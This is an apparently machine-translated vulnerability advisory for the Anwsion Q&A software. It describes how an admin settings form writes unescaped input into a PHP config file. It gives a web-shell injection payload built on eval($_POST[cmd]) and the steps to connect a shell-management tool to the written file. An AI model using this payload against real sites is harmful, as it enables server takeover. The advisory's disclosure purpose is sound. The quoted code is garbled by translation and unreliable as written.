SHELL is available for Anwsion background functional design defects

The vulnerability affects all versions.

Combined with all versions earlier than Anwsion 0.7, the site can be intruded.

The code for the design defect is as follows: lines 75-96 Save the website background configuration to the database and save it to the local PHP file, which can be executed by writing a sentence.
/App/admin/controller/c_setting_class.inc.php

// Save parameters to the database
$ Retval = $ this-> model ('setting')-> set_vars ($ vars );

// Save the cached File
If (! $ This-> model ('setting')-> update_setting_config ())
{
H: ajax_json_output (AWS_APP: RSM (null, "-1", 'the configuration file cannot be written. Set the file system/config/setting. php permission to 0777. '));
}

If ($ retval)
{
ZCACHE: delete ("setting_config ");

H: ajax_json_output (AWS_APP: RSM (null, "1", "system settings modified successfully "));
}
Else
{
H: ajax_json_output (AWS_APP: RSM (null, "-1", "failed to modify system settings "));
}
}

The content of the written configuration file is as follows: system/config/setting. php

Access the background system settings address
Http://sa.sebug.net/admin/setting/setting/group_id-1

Add a sentence \ '; eval ($ _ POST [cmd]) at the website overview; //

Session management tools connect to one sentence/system/config/setting. php
Configuration files of earlier versions of Anwsion 0.6 or earlier are written to/gzphp/config/setting. php
If you cannot access a single sentence file due to rewrite restrictions, you can directly connect to the/index. php file using a one-sentence management tool.

 

 

A single sentence file is successfully connected.

 

Solution:

Wait for the official patch or follow the latest updates.

After the vulnerability is released, developers will be notified to claim it to avoid malicious exploitation.

I wonder why one more code is added in one sentence in vulnerability preview. \ is this added to prevent XSS attacks?
I do not know if one more \ will be added when the browser is browsed after the review is passed. Otherwise, the test will be misled by others.